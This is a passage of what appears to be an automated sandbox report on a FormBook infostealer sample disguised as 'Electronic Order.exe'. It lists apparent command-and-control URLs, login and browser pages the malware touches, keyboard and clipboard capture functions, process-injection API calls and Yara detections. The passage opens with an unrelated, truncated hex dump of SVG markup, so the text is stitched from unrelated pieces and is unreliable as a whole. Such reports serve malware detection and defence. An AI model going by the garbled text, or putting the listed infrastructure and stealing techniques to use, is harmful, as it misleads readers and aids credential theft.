0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: BSPmWtBGjJwku.exe, 00000009.00000002.3960768107.0000000005182000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dospole.top
            Source: BSPmWtBGjJwku.exe, 00000009.00000002.3960768107.0000000005182000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dospole.top/soqq/
            Source: sfc.exe, 00000007.00000002.3959870442.000000000433E000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000388E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.globaltrend.xyz
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://badges.ausowned.com.au/07634
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 00000007.00000002.3959870442.00000000041AC000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.00000000036FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000004662000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003BB2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://http.gn301.com:12345/?u=
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 00000007.00000003.2670839211.00000000079CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033A
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ventraip.com.au/favicon.ico
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sfc.exe, 00000007.00000002.3959870442.0000000003B64000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2807696663.00000000018B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5
            Source: sfc.exe, 00000007.00000002.3959870442.000000000401A000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000356A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E3425A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E34458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E34458
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E3425A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E20219
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E4CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: This is a third-party compiled AutoIt script.0_2_00DC3B4C
            Source: Electronic Order.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Electronic Order.exe, 00000000.00000000.2109623403.0000000000E75000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b2a061c0-1
            Source: Electronic Order.exe, 00000000.00000000.2109623403.0000000000E75000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3e268f16-5
            Source: Electronic Order.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8e63b760-0
            Source: Electronic Order.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7bdd16a3-e
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Electronic Order.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BDB3 NtClose,2_2_0042BDB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574340 NtSetContextThread,2_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574650 NtSuspendThread,2_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AB0 NtWaitForSingleObject,2_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F60 NtCreateProcessEx,2_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F30 NtCreateSection,2_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FE0 NtCreateFile,2_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F90 NtProtectVirtualMemory,2_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FB0 NtResumeThread,2_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FA0 NtQuerySection,2_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E30 NtWriteVirtualMemory,2_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EE0 NtQueueApcThread,2_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E80 NtReadVirtualMemory,2_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EA0 NtAdjustPrivilegesToken,2_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D10 NtMapViewOfSection,2_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D00 NtSetInformationFile,2_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D30 NtUnmapViewOfSection,2_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DD0 NtDelayExecution,2_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DB0 NtEnumerateKey,2_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C70 NtFreeVirtualMemory,2_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C60 NtCreateKey,2_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C00 NtQueryInformationProcess,2_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CC0 NtQueryVirtualMemory,2_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CF0 NtOpenProcess,2_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CA0 NtQueryInformationToken,2_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573010 NtOpenDirectoryObject,2_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573090 NtSetValueKey,2_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035739B0 NtGetContextThread,2_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D70 NtOpenThread,2_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D10 NtOpenProcessToken,2_2_03573D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C4340 NtSetContextThread,LdrInitializeThunk,7_2_031C4340
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C4650 NtSuspendThread,LdrInitializeThunk,7_2_031C4650
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2B60 NtClose,LdrInitializeThunk,7_2_031C2B60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_031C2BA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031C2BF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_031C2BE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2AD0 NtReadFile,LdrInitializeThunk,7_2_031C2AD0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2AF0 NtWriteFile,LdrInitializeThunk,7_2_031C2AF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2F30 NtCreateSection,LdrInitializeThunk,7_2_031C2F30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2FB0 NtResumeThread,LdrInitializeThunk,7_2_031C2FB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2FE0 NtCreateFile,LdrInitializeThunk,7_2_031C2FE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_031C2E80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_031C2EE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_031C2D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_031C2D30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_031C2DD0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_031C2DF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031C2C70
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2C60 NtCreateKey,LdrInitializeThunk,7_2_031C2C60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_031C2CA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C35C0 NtCreateMutant,LdrInitializeThunk,7_2_031C35C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C39B0 NtGetContextThread,LdrInitializeThunk,7_2_031C39B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2B80 NtQueryInformationFile,7_2_031C2B80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2AB0 NtWaitForSingleObject,7_2_031C2AB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2F60 NtCreateProcessEx,7_2_031C2F60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2F90 NtProtectVirtualMemory,7_2_031C2F90
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2FA0 NtQuerySection,7_2_031C2FA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2E30 NtWriteVirtualMemory,7_2_031C2E30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2EA0 NtAdjustPrivilegesToken,7_2_031C2EA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2D00 NtSetInformationFile,7_2_031C2D00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2DB0 NtEnumerateKey,7_2_031C2DB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2C00 NtQueryInformationProcess,7_2_031C2C00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2CC0 NtQueryVirtualMemory,7_2_031C2CC0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C2CF0 NtOpenProcess,7_2_031C2CF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3010 NtOpenDirectoryObject,7_2_031C3010
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3090 NtSetValueKey,7_2_031C3090
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3D10 NtOpenProcessToken,7_2_031C3D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_031C3D70 NtOpenThread,7_2_031C3D70
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007586C0 NtCreateFile,7_2_007586C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00758830 NtReadFile,7_2_00758830
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00758920 NtDeleteFile,7_2_00758920
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_007589C0 NtClose,7_2_007589C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 7_2_00758B30 NtAllocateVirtualMemory,7_2_00758B30
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00E240B1
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E18858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E18858
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E2545F
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DCE8000_2_00DCE800
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEDBB50_2_00DEDBB5
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E4804A0_2_00E4804A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DCE0600_2_00DCE060
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD41400_2_00DD4140
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE24050_2_00DE2405
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF65220_2_00DF6522
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E406650_2_00E40665
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF267E0_2_00DF267E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD68430_2_00DD6843
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE283A0_2_00DE283A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF89DF0_2_00DF89DF
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E40AE20_2_00E40AE2
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF6A940_2_00DF6A94
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD8A0E0_2_00DD8A0E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E1EB070_2_00E1EB07
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E28B130_2_00E28B13
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DECD610_2_00DECD61
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF70060_2_00DF7006
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD31900_2_00DD3190
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD710E0_2_00DD710E
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC12870_2_00DC1287
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE33C70_2_00DE33C7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEF4190_2_00DEF419
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE16C40_2_00DE16C4
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD56800_2_00DD5680
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE78D30_2_00DE78D3
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DD58C00_2_00DD58C0
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE1BB80_2_00DE1BB8
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF9D050_2_00DF9D05
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DCFE400_2_00DCFE40
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE1FD00_2_00DE1FD0
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEBFE60_2_00DEBFE6
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_015836300_2_01583630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010002_2_00401000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041695F2_2_0041695F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169632_2_00416963
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031802_2_00403180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E3932_2_0042E393
